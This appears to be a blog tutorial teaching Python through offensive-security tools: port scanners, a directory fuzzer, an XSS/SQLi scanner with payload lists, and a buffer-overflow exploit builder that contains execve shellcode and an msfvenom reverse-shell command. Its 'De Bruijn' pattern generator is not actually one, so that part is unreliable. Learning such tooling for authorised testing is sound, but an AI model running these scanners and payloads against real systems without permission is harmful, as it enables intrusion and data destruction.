Post

Python for Hackers: From Zero to Exploit Developer

Master Python the hacker way. From basic syntax to advanced exploitation techniques, networking, and automation. This is the complete roadmap to Python mastery for security professionals.

Python for Hackers: From Zero to Exploit Developer

“Python isn’t just a language — it’s the hacker’s Swiss Army knife. Master it, and you master the art of automation.”

Phase 0 — The Python Hacker Mindset

  • Think in Scripts, Not Commands Every repetitive task should become a Python script.

  • Prototype Fast, Optimize Later Get it working, then make it beautiful. Speed beats perfection.

  • Read Code Like Exploits Study how others solve problems. Libraries are learning goldmines.

  • Automate Everything If you do it twice, script it. If you script it, share it.

Python is about thinking in solutions, not syntax.


Phase 1 — Core Python Foundations

1. Essential Syntax & Data Types

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Variables and basic types
target_ip = "192.168.1.1"
port_list = [22, 80, 443, 8080]
scan_results = {}
is_vulnerable = True

# Strings (critical for payload crafting)
payload = f"'; DROP TABLE users; --"
encoded_payload = payload.encode('utf-8')
hex_payload = payload.encode().hex()

# Lists and dictionaries (your data containers)
vulnerabilities = ["SQLi", "XSS", "RCE"]
target_info = {
    "ip": "10.10.10.1",
    "os": "Linux",
    "services": [22, 80, 443]
}

2. Control Flow for Security Logic

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# Conditional logic for vulnerability checks
def check_service(port, banner):
    if "SSH-2.0" in banner and "OpenSSH_7.4" in banner:
        return "Potentially vulnerable to CVE-2018-15473"
    elif port == 21 and "220" in banner:
        return "FTP service detected"
    else:
        return "Unknown service"

# Loops for enumeration
def port_scan(target, ports):
    open_ports = []
    for port in ports:
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(1)
            result = sock.connect_ex((target, port))
            if result == 0:
                open_ports.append(port)
            sock.close()
        except Exception as e:
            continue
    return open_ports

Practice with real scenarios. Every concept should solve a security problem.


Phase 2 — Functions & Error Handling

1. Building Reusable Security Functions

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import socket
import requests
from urllib.parse import quote

def banner_grab(ip, port, timeout=3):
    """Grab service banner for fingerprinting"""
    try:
        sock = socket.socket()
        sock.settimeout(timeout)
        sock.connect((ip, port))
        banner = sock.recv(1024).decode().strip()
        sock.close()
        return banner
    except Exception as e:
        return f"Error: {e}"

def sql_injection_test(url, param, payload):
    """Test for SQL injection vulnerabilities"""
    try:
        malicious_url = f"{url}?{param}={quote(payload)}"
        response = requests.get(malicious_url, timeout=5)
        
        # Check for common SQL error patterns
        sql_errors = ['sql syntax', 'mysql_fetch', 'ora-', 'postgresql']
        
        for error in sql_errors:
            if error in response.text.lower():
                return {"vulnerable": True, "error": error}
                
        return {"vulnerable": False}
    except Exception as e:
        return {"error": str(e)}

2. Exception Handling for Robust Tools

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
def safe_request(url, headers=None, timeout=10):
    """Make HTTP requests with proper error handling"""
    try:
        response = requests.get(url, headers=headers, timeout=timeout)
        return {
            "status_code": response.status_code,
            "headers": dict(response.headers),
            "content": response.text,
            "success": True
        }
    except requests.exceptions.Timeout:
        return {"error": "Request timeout", "success": False}
    except requests.exceptions.ConnectionError:
        return {"error": "Connection failed", "success": False}
    except Exception as e:
        return {"error": str(e), "success": False}

Error handling isn’t optional in security tools — it’s what separates amateurs from professionals.


Phase 3 — File Operations & Data Parsing

1. Reading Wordlists and Payloads

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
def load_wordlist(filename):
    """Load wordlist efficiently"""
    try:
        with open(filename, 'r', encoding='utf-8', errors='ignore') as f:
            return [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        print(f"Wordlist {filename} not found")
        return []

def load_payloads(payload_file):
    """Load XSS/SQLi payloads from file"""
    payloads = {}
    current_category = None
    
    with open(payload_file, 'r') as f:
        for line in f:
            line = line.strip()
            if line.startswith('#'):
                current_category = line[1:].strip()
                payloads[current_category] = []
            elif line and current_category:
                payloads[current_category].append(line)
    
    return payloads

2. Parsing Logs and Output

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
import re
from datetime import datetime

def parse_nmap_output(nmap_file):
    """Extract open ports from nmap output"""
    open_ports = []
    with open(nmap_file, 'r') as f:
        content = f.read()
        
    # Regex to find open ports
    port_pattern = r'(\d+)/tcp\s+open\s+(\w+)'
    matches = re.findall(port_pattern, content)
    
    for port, service in matches:
        open_ports.append({
            "port": int(port),
            "service": service,
            "protocol": "tcp"
        })
    
    return open_ports

def parse_access_logs(log_file):
    """Parse Apache/Nginx access logs for suspicious activity"""
    suspicious_patterns = [
        r'\.\./',  # Directory traversal
        r'<script',  # XSS attempts
        r'union.*select',  # SQL injection
        r'cmd=',  # Command injection
    ]
    
    alerts = []
    with open(log_file, 'r') as f:
        for line_num, line in enumerate(f, 1):
            for pattern in suspicious_patterns:
                if re.search(pattern, line, re.IGNORECASE):
                    alerts.append({
                        "line": line_num,
                        "pattern": pattern,
                        "content": line.strip()
                    })
    
    return alerts

Master file I/O early. Most security tools are just smart file processors.


Phase 4 — Networking & Socket Programming

1. TCP/UDP Socket Programming

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
import socket
import threading

class PortScanner:
    def __init__(self, target, threads=100):
        self.target = target
        self.threads = threads
        self.open_ports = []
        self.lock = threading.Lock()
    
    def scan_port(self, port):
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(1)
            result = sock.connect_ex((self.target, port))
            
            if result == 0:
                banner = self.grab_banner(sock)
                with self.lock:
                    self.open_ports.append({
                        "port": port,
                        "banner": banner
                    })
            sock.close()
        except:
            pass
    
    def grab_banner(self, sock):
        try:
            sock.send(b"GET / HTTP/1.1\r\nHost: target\r\n\r\n")
            banner = sock.recv(1024).decode().strip()
            return banner[:100]  # Limit banner length
        except:
            return ""
    
    def scan_range(self, start_port, end_port):
        threads = []
        for port in range(start_port, end_port + 1):
            t = threading.Thread(target=self.scan_port, args=(port,))
            threads.append(t)
            t.start()
            
            # Limit concurrent threads
            if len(threads) >= self.threads:
                for thread in threads:
                    thread.join()
                threads = []
        
        # Wait for remaining threads
        for thread in threads:
            thread.join()
        
        return self.open_ports

2. HTTP Requests and Web Scraping

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
import requests
from bs4 import BeautifulSoup
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class WebScanner:
    def __init__(self, target_url):
        self.target = target_url
        self.session = requests.Session()
        self.session.verify = False  # Ignore SSL warnings
        
    def directory_brute(self, wordlist):
        """Brute force directories"""
        found_dirs = []
        
        for directory in wordlist:
            url = f"{self.target.rstrip('/')}/{directory}"
            try:
                response = self.session.get(url, timeout=5)
                if response.status_code not in [404, 403]:
                    found_dirs.append({
                        "path": directory,
                        "status": response.status_code,
                        "size": len(response.content)
                    })
                    print(f"[{response.status_code}] {url}")
            except:
                continue
                
        return found_dirs
    
    def extract_forms(self, url):
        """Extract all forms for testing"""
        try:
            response = self.session.get(url)
            soup = BeautifulSoup(response.text, 'html.parser')
            forms = []
            
            for form in soup.find_all('form'):
                form_data = {
                    'action': form.get('action', ''),
                    'method': form.get('method', 'GET').upper(),
                    'inputs': []
                }
                
                for input_tag in form.find_all(['input', 'textarea', 'select']):
                    form_data['inputs'].append({
                        'name': input_tag.get('name', ''),
                        'type': input_tag.get('type', 'text'),
                        'value': input_tag.get('value', '')
                    })
                
                forms.append(form_data)
            
            return forms
        except Exception as e:
            return []

Networking is the foundation of all hacking. Master sockets, and you master remote exploitation.


Phase 5 — Advanced Python for Exploitation

1. Binary Exploitation Helpers

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import struct

class ExploitHelper:
    @staticmethod
    def pack_address(addr, arch='x86'):
        """Pack memory address for exploitation"""
        if arch == 'x86':
            return struct.pack('<I', addr)  # Little endian 32-bit
        elif arch == 'x64':
            return struct.pack('<Q', addr)  # Little endian 64-bit
    
    @staticmethod
    def create_pattern(length):
        """Create De Bruijn pattern for offset finding"""
        alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
        pattern = ""
        for i in range(length):
            pattern += alphabet[i % len(alphabet)]
        return pattern
    
    @staticmethod
    def find_offset(pattern, crash_value):
        """Find offset in buffer overflow"""
        try:
            # Convert crash value to string if it's hex
            if isinstance(crash_value, int):
                crash_str = struct.pack('<I', crash_value).decode()
            else:
                crash_str = crash_value
            
            offset = pattern.find(crash_str)
            return offset if offset != -1 else None
        except:
            return None

def generate_shellcode(command, arch='x86'):
    """Generate basic shellcode (educational purposes)"""
    if arch == 'x86':
        # Basic Linux execve("/bin/sh") shellcode
        shellcode = (
            b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
            b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
        )
    return shellcode

2. Cryptography and Encoding

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import base64
import hashlib
from Crypto.Cipher import AES
from Crypto.Random import get_random_bytes

class CryptoHelper:
    @staticmethod
    def hash_password(password, salt=None):
        """Hash password with salt"""
        if salt is None:
            salt = get_random_bytes(16)
        
        key = hashlib.pbkdf2_hmac('sha256', 
                                password.encode('utf-8'), 
                                salt, 
                                100000)
        return base64.b64encode(salt + key).decode()
    
    @staticmethod
    def simple_xor(data, key):
        """XOR encryption/decryption"""
        key_bytes = key.encode() if isinstance(key, str) else key
        data_bytes = data.encode() if isinstance(data, str) else data
        
        result = bytearray()
        for i in range(len(data_bytes)):
            result.append(data_bytes[i] ^ key_bytes[i % len(key_bytes)])
        
        return bytes(result)
    
    @staticmethod
    def rot13(text):
        """ROT13 encoding"""
        result = ""
        for char in text:
            if 'a' <= char <= 'z':
                result += chr((ord(char) - ord('a') + 13) % 26 + ord('a'))
            elif 'A' <= char <= 'Z':
                result += chr((ord(char) - ord('A') + 13) % 26 + ord('A'))
            else:
                result += char
        return result

Phase 6 — Web Application Testing

1. Automated Vulnerability Scanner

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
import requests
import re
from urllib.parse import urljoin, urlparse

class WebVulnScanner:
    def __init__(self, target_url):
        self.target = target_url
        self.session = requests.Session()
        self.vulnerabilities = []
        
        # Common payloads
        self.xss_payloads = [
            "<script>alert('XSS')</script>",
            "javascript:alert('XSS')",
            "<img src=x onerror=alert('XSS')>",
            "';alert('XSS');//"
        ]
        
        self.sql_payloads = [
            "' OR '1'='1",
            "' UNION SELECT NULL--",
            "'; DROP TABLE users--",
            "1' AND SLEEP(5)--"
        ]
    
    def test_xss(self, forms):
        """Test for XSS vulnerabilities"""
        for form in forms:
            for payload in self.xss_payloads:
                try:
                    data = {}
                    for input_field in form['inputs']:
                        if input_field['type'] in ['text', 'search', 'email']:
                            data[input_field['name']] = payload
                        else:
                            data[input_field['name']] = input_field['value']
                    
                    url = urljoin(self.target, form['action'])
                    
                    if form['method'] == 'POST':
                        response = self.session.post(url, data=data)
                    else:
                        response = self.session.get(url, params=data)
                    
                    if payload in response.text:
                        self.vulnerabilities.append({
                            'type': 'XSS',
                            'url': url,
                            'payload': payload,
                            'method': form['method']
                        })
                        
                except Exception as e:
                    continue
    
    def test_sql_injection(self, forms):
        """Test for SQL injection"""
        for form in forms:
            for payload in self.sql_payloads:
                try:
                    data = {}
                    for input_field in form['inputs']:
                        if input_field['type'] in ['text', 'password', 'search']:
                            data[input_field['name']] = payload
                        else:
                            data[input_field['name']] = input_field['value']
                    
                    url = urljoin(self.target, form['action'])
                    
                    if form['method'] == 'POST':
                        response = self.session.post(url, data=data)
                    else:
                        response = self.session.get(url, params=data)
                    
                    # Check for SQL error patterns
                    sql_errors = [
                        'sql syntax', 'mysql', 'ora-', 'postgresql',
                        'sqlite', 'mssql', 'odbc', 'jdbc'
                    ]
                    
                    for error in sql_errors:
                        if error in response.text.lower():
                            self.vulnerabilities.append({
                                'type': 'SQL_INJECTION',
                                'url': url,
                                'payload': payload,
                                'error': error
                            })
                            break
                            
                except Exception as e:
                    continue
    
    def generate_report(self):
        """Generate vulnerability report"""
        if not self.vulnerabilities:
            return "No vulnerabilities found."
        
        report = f"Vulnerability Report for {self.target}\n"
        report += "=" * 50 + "\n\n"
        
        for vuln in self.vulnerabilities:
            report += f"[{vuln['type']}] {vuln['url']}\n"
            report += f"Payload: {vuln['payload']}\n"
            if 'error' in vuln:
                report += f"SQL Error: {vuln['error']}\n"
            report += "-" * 30 + "\n"
        
        return report

Phase 7 — Automation & Frameworks

1. Building a Recon Framework

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#!/usr/bin/env python3

import argparse
import json
import threading
from concurrent.futures import ThreadPoolExecutor
import subprocess
import requests

class ReconFramework:
    def __init__(self, target_domain):
        self.target = target_domain
        self.results = {
            'subdomains': [],
            'open_ports': [],
            'technologies': [],
            'directories': [],
            'vulnerabilities': []
        }
        
    def subdomain_enum(self):
        """Enumerate subdomains"""
        print(f"[+] Enumerating subdomains for {self.target}")
        
        # Using subfinder (if installed)
        try:
            result = subprocess.run(['subfinder', '-d', self.target, '-silent'], 
                                  capture_output=True, text=True, timeout=300)
            subdomains = result.stdout.strip().split('\n')
            self.results['subdomains'] = [s for s in subdomains if s]
        except:
            print("[-] Subfinder not found, using manual method")
            self.results['subdomains'] = [f"www.{self.target}", f"mail.{self.target}"]
    
    def port_scan_all(self):
        """Port scan all discovered subdomains"""
        print("[+] Scanning ports on discovered hosts")
        
        def scan_host(subdomain):
            scanner = PortScanner(subdomain, threads=50)
            ports = scanner.scan_range(1, 1000)
            return {subdomain: ports}
        
        with ThreadPoolExecutor(max_workers=10) as executor:
            futures = [executor.submit(scan_host, sub) for sub in self.results['subdomains']]
            for future in futures:
                result = future.result()
                self.results['open_ports'].append(result)
    
    def technology_detection(self):
        """Detect web technologies"""
        print("[+] Detecting web technologies")
        
        for subdomain in self.results['subdomains']:
            try:
                url = f"http://{subdomain}"
                response = requests.get(url, timeout=5)
                
                # Check headers for technology indicators
                tech_indicators = {
                    'server': response.headers.get('Server', ''),
                    'x-powered-by': response.headers.get('X-Powered-By', ''),
                    'set-cookie': response.headers.get('Set-Cookie', '')
                }
                
                self.results['technologies'].append({
                    subdomain: tech_indicators
                })
                
            except:
                continue
    
    def run_full_recon(self):
        """Run complete reconnaissance"""
        print(f"[+] Starting full recon on {self.target}")
        
        self.subdomain_enum()
        self.port_scan_all()
        self.technology_detection()
        
        return self.results
    
    def save_results(self, filename):
        """Save results to JSON file"""
        with open(filename, 'w') as f:
            json.dump(self.results, f, indent=2)
        print(f"[+] Results saved to {filename}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Automated Reconnaissance Framework")
    parser.add_argument("target", help="Target domain")
    parser.add_argument("-o", "--output", help="Output file", default="recon_results.json")
    
    args = parser.parse_args()
    
    recon = ReconFramework(args.target)
    results = recon.run_full_recon()
    recon.save_results(args.output)

Phase 8 — Essential Libraries for Hackers

Security-Focused Libraries

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# Network and HTTP
import socket
import requests
import urllib3
from scapy.all import *

# Web scraping and parsing
from bs4 import BeautifulSoup
import lxml
import selenium

# Cryptography
from Crypto.Cipher import AES, DES
from Crypto.Random import get_random_bytes
import hashlib
import base64

# System and process
import subprocess
import os
import sys
import threading
import multiprocessing

# Data manipulation
import json
import csv
import xml.etree.ElementTree as ET
import re

# Database connectivity
import sqlite3
import pymongo

Quick Setup Script

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
#!/usr/bin/env python3
"""
Hacker's Python Environment Setup
Install essential libraries for security research
"""

import subprocess
import sys

def install_package(package):
    """Install package using pip"""
    try:
        subprocess.check_call([sys.executable, "-m", "pip", "install", package])
        print(f"{package} installed successfully")
    except subprocess.CalledProcessError:
        print(f"❌ Failed to install {package}")

def main():
    essential_packages = [
        "requests",
        "beautifulsoup4",
        "scapy",
        "pycryptodome",
        "paramiko",
        "selenium",
        "python-nmap",
        "colorama",
        "tqdm"
    ]
    
    print("🔧 Setting up Python hacker environment...")
    print("Installing essential packages:")
    
    for package in essential_packages:
        install_package(package)
    
    print("\n🎉 Setup complete! Ready to hack with Python.")

if __name__ == "__main__":
    main()

Don’t install everything at once. Learn each library by building something with it.


Phase 9 — Real-World Projects

Project 1: Multi-threaded Port Scanner

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
#!/usr/bin/env python3
"""
Advanced Port Scanner with Banner Grabbing
Usage: python3 scanner.py -t target -p 1-1000 -T 100
"""

import argparse
import socket
import threading
import time
from queue import Queue

class AdvancedPortScanner:
    def __init__(self, target, port_range, threads=100, timeout=1):
        self.target = target
        self.port_range = port_range
        self.threads = threads
        self.timeout = timeout
        self.open_ports = []
        self.queue = Queue()
        self.lock = threading.Lock()
        
    def parse_port_range(self, port_range):
        """Parse port range (e.g., '1-1000' or '80,443,8080')"""
        ports = []
        for part in port_range.split(','):
            if '-' in part:
                start, end = map(int, part.split('-'))
                ports.extend(range(start, end + 1))
            else:
                ports.append(int(part))
        return ports
    
    def scan_port(self):
        """Worker thread function"""
        while True:
            port = self.queue.get()
            if port is None:
                break
                
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(self.timeout)
                result = sock.connect_ex((self.target, port))
                
                if result == 0:
                    banner = self.grab_banner(sock, port)
                    with self.lock:
                        self.open_ports.append({
                            'port': port,
                            'banner': banner,
                            'service': self.identify_service(port, banner)
                        })
                        print(f"[+] {port}/tcp open - {banner[:50]}")
                
                sock.close()
            except Exception as e:
                pass
            finally:
                self.queue.task_done()
    
    def grab_banner(self, sock, port):
        """Grab service banner"""
        try:
            if port == 80:
                sock.send(b"GET / HTTP/1.1\r\nHost: " + self.target.encode() + b"\r\n\r\n")
            elif port == 21:
                pass  # FTP sends banner automatically
            elif port == 22:
                pass  # SSH sends banner automatically
            elif port == 25:
                pass  # SMTP sends banner automatically
            
            banner = sock.recv(1024).decode('utf-8', errors='ignore').strip()
            return banner
        except:
            return "Unknown"
    
    def identify_service(self, port, banner):
        """Identify service based on port and banner"""
        common_services = {
            21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP",
            53: "DNS", 80: "HTTP", 110: "POP3", 143: "IMAP",
            443: "HTTPS", 993: "IMAPS", 995: "POP3S"
        }
        
        if port in common_services:
            return common_services[port]
        
        # Banner-based detection
        if "HTTP" in banner.upper():
            return "HTTP"
        elif "SSH" in banner.upper():
            return "SSH"
        elif "FTP" in banner.upper():
            return "FTP"
        else:
            return "Unknown"
    
    def run_scan(self):
        """Run the port scan"""
        ports = self.parse_port_range(self.port_range)
        
        print(f"[+] Scanning {self.target} ({len(ports)} ports)")
        print(f"[+] Using {self.threads} threads with {self.timeout}s timeout")
        
        # Start worker threads
        threads = []
        for _ in range(self.threads):
            t = threading.Thread(target=self.scan_port)
            t.start()
            threads.append(t)
        
        # Add ports to queue
        start_time = time.time()
        for port in ports:
            self.queue.put(port)
        
        # Wait for completion
        self.queue.join()
        
        # Stop worker threads
        for _ in range(self.threads):
            self.queue.put(None)
        for t in threads:
            t.join()
        
        scan_time = time.time() - start_time
        
        # Print results
        print(f"\n[+] Scan completed in {scan_time:.2f} seconds")
        print(f"[+] Found {len(self.open_ports)} open ports:")
        
        for port_info in sorted(self.open_ports, key=lambda x: x['port']):
            print(f"    {port_info['port']}/tcp - {port_info['service']}")
        
        return self.open_ports

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Advanced Port Scanner")
    parser.add_argument("-t", "--target", required=True, help="Target IP or hostname")
    parser.add_argument("-p", "--ports", default="1-1000", help="Port range (e.g., 1-1000 or 80,443)")
    parser.add_argument("-T", "--threads", type=int, default=100, help="Number of threads")
    parser.add_argument("--timeout", type=float, default=1.0, help="Socket timeout")
    
    args = parser.parse_args()
    
    scanner = AdvancedPortScanner(args.target, args.ports, args.threads, args.timeout)
    results = scanner.run_scan()

Project 2: Web Directory Fuzzer

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#!/usr/bin/env python3
"""
Web Directory Fuzzer with Custom Wordlists
Usage: python3 dirfuzz.py -u http://example.com -w wordlist.txt
"""

import requests
import threading
import argparse
import time
from queue import Queue
from urllib.parse import urljoin
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

class DirectoryFuzzer:
    def __init__(self, base_url, wordlist_file, threads=50, timeout=5):
        self.base_url = base_url.rstrip('/')
        self.wordlist_file = wordlist_file
        self.threads = threads
        self.timeout = timeout
        self.queue = Queue()
        self.results = []
        self.lock = threading.Lock()
        self.session = requests.Session()
        self.session.verify = False
        
        # Custom headers to avoid detection
        self.session.headers.update({
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'
        })
    
    def load_wordlist(self):
        """Load wordlist from file"""
        try:
            with open(self.wordlist_file, 'r', encoding='utf-8', errors='ignore') as f:
                return [line.strip() for line in f if line.strip() and not line.startswith('#')]
        except FileNotFoundError:
            print(f"[-] Wordlist file '{self.wordlist_file}' not found")
            return []
    
    def fuzz_directory(self):
        """Worker thread for directory fuzzing"""
        while True:
            path = self.queue.get()
            if path is None:
                break
                
            url = f"{self.base_url}/{path}"
            
            try:
                response = self.session.get(url, timeout=self.timeout)
                
                # Filter interesting responses
                if response.status_code not in [404]:
                    with self.lock:
                        result = {
                            'url': url,
                            'status': response.status_code,
                            'size': len(response.content),
                            'redirect': response.url if response.url != url else None
                        }
                        self.results.append(result)
                        
                        # Color coding for different status codes
                        color = self.get_color_for_status(response.status_code)
                        print(f"{color}[{response.status_code}] {url} ({len(response.content)} bytes)")
                        
            except requests.exceptions.RequestException:
                pass
            finally:
                self.queue.task_done()
    
    def get_color_for_status(self, status_code):
        """Get color for status code"""
        colors = {
            200: '\033[92m',  # Green
            301: '\033[93m',  # Yellow
            302: '\033[93m',  # Yellow
            403: '\033[91m',  # Red
            500: '\033[95m',  # Purple
        }
        return colors.get(status_code, '\033[0m')  # Default
    
    def run_fuzzing(self):
        """Run directory fuzzing"""
        wordlist = self.load_wordlist()
        if not wordlist:
            return []
        
        print(f"[+] Fuzzing {self.base_url}")
        print(f"[+] Wordlist: {self.wordlist_file} ({len(wordlist)} entries)")
        print(f"[+] Threads: {self.threads}")
        print("-" * 50)
        
        # Start worker threads
        threads = []
        for _ in range(self.threads):
            t = threading.Thread(target=self.fuzz_directory)
            t.start()
            threads.append(t)
        
        # Add paths to queue
        start_time = time.time()
        for path in wordlist:
            self.queue.put(path)
        
        # Wait for completion
        self.queue.join()
        
        # Stop worker threads
        for _ in range(self.threads):
            self.queue.put(None)
        for t in threads:
            t.join()
        
        elapsed = time.time() - start_time
        print(f"\n[+] Fuzzing completed in {elapsed:.2f} seconds")
        print(f"[+] Found {len(self.results)} interesting paths")
        
        return self.results

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Web Directory Fuzzer")
    parser.add_argument("-u", "--url", required=True, help="Target URL")
    parser.add_argument("-w", "--wordlist", required=True, help="Wordlist file")
    parser.add_argument("-t", "--threads", type=int, default=50, help="Number of threads")
    parser.add_argument("--timeout", type=float, default=5, help="Request timeout")
    
    args = parser.parse_args()
    
    fuzzer = DirectoryFuzzer(args.url, args.wordlist, args.threads, args.timeout)
    results = fuzzer.run_fuzzing()

Phase 10 — Python for Exploit Development

1. Buffer Overflow Exploitation

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#!/usr/bin/env python3
"""
Buffer Overflow Exploit Development Helper
Generates patterns, calculates offsets, builds payloads
"""

import struct
import socket
import sys

class BufferOverflowExploit:
    def __init__(self, target_ip, target_port):
        self.target_ip = target_ip
        self.target_port = target_port
        self.pattern_create_len = 1000
        
    def create_pattern(self, length):
        """Create cyclic pattern for offset discovery"""
        pattern = ""
        chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
        
        for i in range(length):
            pattern += chars[i % len(chars)]
        return pattern.encode()
    
    def find_offset(self, pattern, crash_address):
        """Find offset where EIP is overwritten"""
        try:
            # Convert address to little-endian bytes
            if isinstance(crash_address, str):
                # Handle hex string
                crash_bytes = bytes.fromhex(crash_address.replace('0x', ''))
            else:
                crash_bytes = struct.pack('<I', crash_address)
            
            pattern_str = pattern.decode()
            crash_str = crash_bytes.decode('utf-8', errors='ignore')
            
            offset = pattern_str.find(crash_str)
            return offset if offset != -1 else None
            
        except Exception as e:
            print(f"Error finding offset: {e}")
            return None
    
    def generate_bad_chars(self):
        """Generate bad character detection string"""
        bad_chars = b""
        for i in range(1, 256):  # Skip null byte
            bad_chars += struct.pack('B', i)
        return bad_chars
    
    def build_payload(self, offset, eip_address, shellcode, nop_sled=100):
        """Build complete exploit payload"""
        # NOP sled
        nops = b"\x90" * nop_sled
        
        # Buffer padding
        buffer = b"A" * offset
        
        # EIP overwrite
        eip = struct.pack('<I', eip_address)
        
        # Payload structure: [BUFFER][EIP][NOPS][SHELLCODE]
        payload = buffer + eip + nops + shellcode
        
        return payload
    
    def send_payload(self, payload):
        """Send payload to target"""
        try:
            print(f"[+] Sending payload to {self.target_ip}:{self.target_port}")
            print(f"[+] Payload size: {len(payload)} bytes")
            
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((self.target_ip, self.target_port))
            sock.send(payload)
            sock.close()
            
            print("[+] Payload sent successfully")
            
        except Exception as e:
            print(f"[-] Error sending payload: {e}")

# Example shellcode (Linux x86 execve /bin/sh)
LINUX_SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
    b"\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# Windows reverse shell shellcode (example)
def generate_windows_reverse_shell(ip, port):
    """Generate Windows reverse shell shellcode"""
    # This is a simplified example - use msfvenom for real exploits
    shellcode_template = (
        # This would contain actual shellcode bytes
        # Use: msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f python
        b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00"  # Example bytes
    )
    return shellcode_template

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python3 bof_exploit.py <target_ip> <target_port>")
        sys.exit(1)
    
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2])
    
    exploit = BufferOverflowExploit(target_ip, target_port)
    
    # Step 1: Generate pattern for fuzzing
    pattern = exploit.create_pattern(1000)
    print(f"[+] Generated pattern: {pattern[:50]}...")
    
    # Step 2: After crash, find offset (example)
    # offset = exploit.find_offset(pattern, 0x41414141)  # AAAA in hex
    
